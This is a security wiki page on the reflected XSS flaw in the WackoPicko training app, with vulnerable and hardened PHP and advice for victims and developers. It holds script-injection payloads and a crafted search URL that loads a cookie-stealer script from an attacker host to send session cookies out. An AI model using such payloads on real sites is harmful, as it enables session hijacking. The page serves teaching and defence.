WackoPicko/Reflected-XSS

From aldeid

Description

There is an XSS vulnerability on the search page, which is accessible without logging into the application. The query parameter is not sanitized before being echoed back to the user. The presence of the vulnerability can be tested by setting the query parameter to <script>alert('xss')</script>. When this string is reflected to the user, it causes the browser to display an alert message. (Of course, an attacker would leverage the vulnerability to perform some malicious activity rather than alerting the victim.)


Proof of Concept

Enter some JavaScript (e.g. <script>alert('oops');</script>) in the search field and press ENTER. As you can see, the content hasn't been sanitized and our script is interpreted by the browser:

[Screenshot: WackoPicko-reflected-xss.png]

In an attack scenario, it is probable that an attacker would exploit this vulnerability to steal cookies. To test it, install a cookie stealer (a small PHP script, e.g. http://xqus.com/php-cookie-stealer).

  • The attacker installs a cookie stealer on a remote machine (192.168.100.14)
  • The attacker sends a mail to the victim; the mail contains a malicious link that exploits the vulnerability:
http://192.168.100.18/pictures/search.php?query=%3Cscript+src%3D%22http://192.168.100.14/cookie_stealer.php%22%3E%3C/script%3E&x=33&y=10
  • The victim clicks on the link and, through his/her browser, sends the content of the cookies
  • The attacker gathers the information contained in the cookies.txt file. Here is an example:
PHPSESSID=04ri9ifu7sjhgdddlmg9hthg95v3

How to detect

Some tools

How to protect against it?

Code

In pictures/search.php, we can see that the GET parameter is not sanitized before being sent back to the browser:

if (!isset($_GET['query']))
{
   http_redirect("/error.php?msg=Error, need to provide a query to search");
}

$pictures = Pictures::get_all_pictures_by_tag($_GET['query']);

?>

<?php our_header("", $_GET['query']); ?>

<div class="column prepend-1 span-24 first last">
<h2>Pictures that are tagged as '<?= $_GET['query']  ?>'</h2>

   <?php thumbnail_pic_list($pictures); ?>

</div>
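The `<h2>` line above next to a hardened form, as an added example that is not WackoPicko's own code. The helper names `h()`, `query_from_request()`, `heading_vulnerable()` and `heading_hardened()` are hypothetical, and the request arrays are constructed sample input using the test string from this page.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: encode a value for HTML element content or a
// quoted attribute value. It is not suitable inside <script> or a URL.
function h(string $value): string
{
    // ENT_QUOTES encodes both ' and "; ENT_SUBSTITUTE replaces invalid
    // UTF-8 sequences instead of making the call return an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical helper: accept the parameter only if it is a plain string.
// PHP turns ?query[]=a into an array, which must not reach the template.
function query_from_request(array $get): ?string
{
    $q = $get['query'] ?? null;
    return is_string($q) ? $q : null;
}

// Same behaviour as the <h2> line in search.php: raw value in the markup.
function heading_vulnerable(string $query): string
{
    return "<h2>Pictures that are tagged as '" . $query . "'</h2>";
}

// Hardened form: the value is encoded at the point of output.
function heading_hardened(string $query): string
{
    return "<h2>Pictures that are tagged as '" . h($query) . "'</h2>";
}

// Constructed request data: the test string from the page, as it appears
// in $_GET after PHP has URL-decoded the query string.
$samples = [
    ['query' => "<script>alert('oops');</script>"],
    ['query' => ['unexpected', 'array']],
    [],
];

foreach ($samples as $get) {
    $query = query_from_request($get);
    if ($query === null) {
        echo "rejected: query missing or not a string", PHP_EOL;
        continue;
    }
    echo "vulnerable: ", heading_vulnerable($query), PHP_EOL;
    echo "hardened:   ", heading_hardened($query), PHP_EOL;
}
```

The excerpt also passes the same parameter to our_header(); its body is not shown on this page, so wherever it prints the value the same output encoding is needed.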

The victim

Some wise advice:

  • Don't trust links in your mails: never click on links you receive in your mails, or double-check them first (analyze the real link behind the href)

The developer

A vulnerability is the result of the developer's mistake. Vulnerabilities come from:

  • A lack of time during the development phase: Developers often have only a few days to develop an application. Under pressure, mistakes and omissions are common.
  • Poor testing phase: Often, the testing phase focuses on the application's functionality more than on security issues. Don't forget to cover this part.
  • Lack of knowledge: Development is sometimes the responsibility of beginners, which leads to badly developed applications, especially for applications developed "from scratch". Use development frameworks that already implement security layers.
